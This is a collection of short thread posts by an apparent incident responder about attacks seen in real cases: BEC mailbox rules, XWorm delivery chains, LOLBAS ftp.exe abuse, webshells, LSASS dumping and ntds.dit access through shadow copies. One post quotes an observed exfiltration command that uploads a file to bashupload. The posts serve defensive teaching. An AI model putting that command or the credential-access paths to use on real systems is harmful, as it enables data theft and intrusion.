1/ Love that Minesweeper reference here :) They tried hard to blend in; however, certain metadata about a file is baked into the PE header. Attackers can rename binaries all they want, but fields like original_file_name or inconsistencies in headers often give them away.

1/ In today's BEC (Business E-Mail Compromise) case, I stumbled (again) over the "Set-MailboxJunkEmailConfiguration" operation. I talked about it a while back. [1] The attacker also created a new Inbox rule for moving incoming emails for target personnel to a designated folder.

My team colleague, Yann Malherbe, wrote an in-depth blog post about the Automation of VHDX Investigations with 🦖 labs.infoguard.ch/posts/automa...

1/ My first keynote will be about how we spend billions on (cyber) security but remain insecure. I’ll use a recent case as an example, which my colleague Asger Deleuran Strunk investigated:

1/ Mandiant mentioned the User Access Logs in their newest report [1]. We use the UAL extensively in our investigations, as this artifact can retain logs for a longer period of time, as outlined by Mandiant (and also covered in my Anti-Forensics presentation).

1/ PingCastle now highlights when no policy is in place to prevent scripting files (such as .js) from being executed via double-click.

1/ Next one from the HP Wolf Report [1]: This file is decoded by the PowerShell command and saved as “CHROME.PIF” in the ProgramData directory. It is then run.

1/ XWorm, as described in the latest HP Wolf Security report [1], goes to great lengths to evade security products. .chm file, VBScript, PowerShell, batch file, JavaScript, PowerShell, Steganography (the data from the image is used to reflectively load a .NET assembly).. 😮‍

"Our analysis revealed a concerning scenario: threat actors compromised one victim, weaponized their real documents, and then used these compromised documents to attack another victim." Source: www.bitdefender.com/en-us/blog/b...

1/ Not all web browsers support the passkey (FIDO2) authentication method with Microsoft Entra ID. For instance, FIDO is not supported when using Safari on Windows.

1/ ASEC has recently discovered the massive distribution of SmartLoader malware through GitHub repositories. Upon searching for keywords such as game hacks, software crack, and automation tool,

⏳ Time is crucial in Incident Response ⏳ In one incident, the victim engaged Talos IR immediately after discovering malicious activity alerts. Talos IR worked swiftly to combat additional malicious activity and prevented the execution of any encryption in the environment.

1/ Remove discoverable passwords in Active Directory account attributes A nice feature of Microsoft Defender for Identity is its ability to detect potential credential exposure in Active Directory by analyzing commonly used free-text attributes.

1/ I recently read an interesting blog post where the threat actor brought a copy of the Group Policy Editor toolkit onto the compromised host, started MMC, hid the window from the user, and simulated GUI operations to set up persistence (no UAC bypass was needed).

1/ Coming back to the Defender Portal. Malicious File? OMG 😱 Nope. Don't panic. What you see in the "Additional information" is exactly that, additional information. LNK files can be used by adversaries to execute code, as outlined in the corresponding MITRE technique [1].

1/ Do your Incident Response team a favour: If you are using the Defender Portal and sending screenshots, please set your timezone within your account to UTC. The following (redacted) image was sent to me yesterday by a client.

1/ Who is actively monitoring the installation/dropping of Python interpreters? The image below is from an ESET report [1], but we, for example, discovered a Python backdoor in a recent incident response case (a blog post is currently in progress).

1/ Interesting infection chain that utilizes the legitimate ftp.exe binary in conjunction with an FTP script to run the malicious payload (first copy it over and then start it). [1] (Mis-)using ftp.exe to run commands in a script is already documented in the LOLBAS project. [2]

1/ Yeah, sure. 😅 Show me the end user who checks the Target information from a shortcut (.LNK) file before running it (besides techies and IT security folks). However, we can better hunt for these files and their execution.

1/ What I learned today. Nice - I wasn't aware of the InstallProduct method from PowerShell to fetch a remotely hosted MSI file and subsequently install it. Invoke-WebRequest is one of the more popular methods, at least in our incident response cases.

1/ I'm pondering over a new talk 💭 - the following code came to mind, which I've pasted below. Does anyone still remember this one? 😅

1/ An excerpt from a recent IR report, analysed by one of my team colleagues: 𝘈𝘤𝘤𝘰𝘳𝘥𝘪𝘯𝘨 𝘵𝘰 𝘵𝘩𝘦 𝘤𝘶𝘴𝘵𝘰𝘮𝘦𝘳, 𝘢𝘤𝘤𝘦𝘴𝘴 𝘵𝘰 𝘵𝘩𝘦 𝘙𝘋𝘗 𝘴𝘦𝘳𝘷𝘪𝘤𝘦 𝘸𝘢𝘴 𝘪𝘯𝘵𝘦𝘯𝘥𝘦𝘥 𝘵𝘰 𝘣𝘦 𝘳𝘦𝘴𝘵𝘳𝘪𝘤𝘵𝘦𝘥 𝘵𝘰 𝘢 𝘴𝘱𝘦𝘤𝘪𝘧𝘪𝘤 𝘴𝘶𝘣𝘴𝘦𝘵 𝘰𝘧 𝘐𝘗 𝘢𝘥𝘥𝘳𝘦𝘴𝘴𝘦𝘴 𝘵𝘩𝘳𝘰𝘶𝘨𝘩 𝘢 𝘧𝘪𝘳𝘦𝘸𝘢𝘭𝘭 𝘳𝘶𝘭𝘦, 𝘵𝘩𝘦𝘳𝘦𝘣𝘺 𝘣𝘭𝘰𝘤𝘬𝘪𝘯𝘨 𝘶𝘯𝘢𝘶𝘵𝘩𝘰𝘳𝘪𝘴𝘦𝘥 𝘦𝘹𝘵𝘦𝘳𝘯𝘢𝘭 𝘤𝘰𝘯𝘯𝘦𝘤𝘵𝘪𝘰𝘯𝘴.

New attack surface unlocked - hack the FortiGate Cloud account to reset the FortiGate admin password.

Awesome read & technique - well done 👏 𝘐𝘯 𝘵𝘩𝘪𝘴 𝘣𝘭𝘰𝘨 𝘱𝘰𝘴𝘵, 𝘸𝘦 𝘵𝘢𝘭𝘬𝘦𝘥 𝘢𝘣𝘰𝘶𝘵 𝘢 𝘩𝘰𝘸 𝘢 𝘸𝘦𝘭𝘭-𝘬𝘯𝘰𝘸𝘯 𝘵𝘦𝘤𝘩𝘯𝘪𝘲𝘶𝘦 𝘧𝘰𝘳 𝘦𝘯𝘥𝘱𝘰𝘪𝘯𝘵 𝘱𝘦𝘳𝘴𝘪𝘴𝘵𝘦𝘯𝘤𝘦, 𝘤𝘢𝘯 𝘣𝘦 𝘳𝘦-𝘪𝘯𝘷𝘦𝘯𝘵𝘦𝘥 𝘪𝘯 𝘢 𝘤𝘭𝘰𝘶𝘥 𝘦𝘯𝘷𝘪𝘳𝘰𝘯𝘮𝘦𝘯𝘵 𝘧𝘰𝘳 𝘱𝘳𝘪𝘷𝘪𝘭𝘦𝘨𝘦 𝘦𝘴𝘤𝘢𝘭𝘢𝘵𝘪𝘰𝘯 𝘱𝘶𝘳𝘱𝘰𝘴𝘦𝘴. labs.reversec.com/posts/2025/0...

What I learnt today: When NetScan is executed with the ‘Check for write access’ option enabled, a ‘delete[.]me’ file is created then deleted on discovered shares.[1] Thanks, TheDFIRReport - this is exactly what we are seeing in a recent case. I owe you one 🍻 [1] thedfirreport.com/2025/02/24/c...

1/ Dear attacker, Clear-History does not clear the PSReadLine command history file. Clear-History, as taken from the official documentation, deletes only entries from the PowerShell session command history.

During a recent Incident Response case, we observed the threat actor exfiltrating data to the platform bashupload[.]com, which enables easy file uploads via a simple cURL command: curl bashupload[.]com -T your_file.txt Notably, Palo Alto highlighted this service in a February report, stating:

1/ In a recent incident response case, threat actors escalated from a compromised Ivanti appliance to full Domain Admin privileges in under eight minutes (..!).

1/ During a recent incident response case, we observed the following file access: \\localhost\C$\@ GMT-2025.06.21-10.53.43\Windows\NTDS\ntds.dit This is a clever method of accessing a Volume Shadow Copy (VSS) snapshot.

Ever heard of shellbags? Like in the example here: My Computer -> ? -> Users -> <compromised_used> -> ADRecon-Report-20250225235831 Shellbags are a subset of data found within UsrClass.dat and sometimes in the NTUSER.DAT hive. They are used by Windows to remember folder view settings for Explorer.

1/ Remote Connection from 30.1.40[.]64 😱 or not 🤔 After a second look, it turned out, that the customer is using a public IP addressing scheme for internal hosts 🙊 As somebody wrote on the Cisco forum:

🛬👨‍🏫🛫🔁 I love being a speaker. I also love meeting people, hearing their thoughts, and exchanging ideas. While I was enjoying tapas in the charming old town of Donostia-San Sebastián, I had a lengthy conversation with an elderly gentleman from Glasgow.

Yesterday, I presented "Anti-Forensic" techniques for Windows and Linux at the Troopers conference in Heidelberg. This morning at breakfast, I was approached by an attendee and asked if I had looked at the zapper tool from The Hacker's Choice. [1] I said no, but of course, my interest was piqued 🕵

1/ A teammate of mine worked on an interesting incident where the attackers connected to the backup server via RDP, launched the Chrome browser, and searched on Google for "VirtualBox". The VirtualBox installer was then downloaded to the home directory of the compromised user:

An attacker downloaded a freely available webshell from GitHub and stored it under the installation path of the legitimate SAP installation in the recent SAP Visual Composer exploitation, "disguised" as a PHPMyAdmin file (see image).

1/ The screenshot below is from a recent Incident Response case, investigated by my team colleague. The user "printer" suddenly sprang to life because an attacker brute-forced the VPN login (without Multi-Factor Authentication).

1/ During various Ivanti Endpoint Manager Mobile investigations (CVE-2025-4428), we (as others in our field) saw that the threat actors dumped heap memory from the Tomcat Java processes using jcmd, in order to search the dumped data for sensitive information.

1/ If I were to start a new job at a company, and if I have one (security-related) wish .. If I could pick anything, I’d ask for a clear naming convention for all computers and servers. Additionally, I’d want DHCP and security logs to be stored centrally in a SIEM system.

1/ As I'm about to present about Linux Rootkits at the 10th edition of EuskalHack (🎉), here’s a nifty trick to detect a userland rootkit that tries to hide its presence by blocking access to /etc/ld.so.preload.

1/ I successfully tested a LSASS dumping technique on a Windows 10 lab machine, which we encountered on a recent Incident Response engagement (no EDR, default Defender installed). The "MiniDumpWriteDump" technique, as described here [1], was successful in writing the LSASS process to disk.

1/ This might be a niche persistence mechanism, but during an investigation, I stumbled upon the following file on a Linux server: /home/<user>/.config/autostart/set_trusted.desktop With the following content:

1/ This might come in handy as an "Evidence of Execution" artifact, although I'm not sure when exactly DCOM will log this entry (example below from a recent case, showcasing the execution of Advanced IP Scanner by the attacker): Source: Microsoft-Windows-DistributedCOM Event ID: 10028

1/ I just thought about my old FIRSTCON presentation and the accompanying blog post (N-IOCs to Rule Them All) while reading the HP Threat Insights Report from June this year. dfir.ch/posts/n-iocs/

1/ I wrote about "Abusing the 'search-ms' URI protocol handler" back in August last year, and apparently, this technique is still going strong, as presented in the latest HP Threat Insights Report from June 2025: dfir.ch/posts/search...

1/ The platform Mega, which is popular among attackers for data exfiltration ("Online privacy for everyone"), also provides software for file transfer to the platform. As one of our customers found out the hard way, the software does not use a high port for data transmission.

1/ "But in Q1, we also saw a new social engineering lure where the attackers started using fake website cookie banners to spread malware. A cookie banner, which is required for GDPR compliance, is a pop-up message displayed on a website to inform users about the use of cookies and other tracking

1/ I don’t know how many times I’ve discussed this topic before, but due to recent events, I'm bringing it up again: One of our customers experienced an Azure compromise - attackers gained unauthorized access to an account.

1/ It doesn't always require a hacked mailbox, for example, to send invoices with a fraudulent International Bank Account Number (IBAN). The following (modified) example from a real investigation clearly demonstrates how internal staff must also be trained to defend against this type of attack.

While investigating a compromised network, we found suspicious PowerShell code that ran on a domain controller. The script downloaded a file called chrome_installer.exe and installed it. We checked the file and found it was signed by Google, so it’s a genuine Chrome installer.

1/ My team colleague, Florian Scheiber, investigated the compromise of a server that had exposed the Remote Desktop Services (RDS) to the Internet. The attackers were able to brute-force an administrator account and subsequently stole data from the server before encrypting it.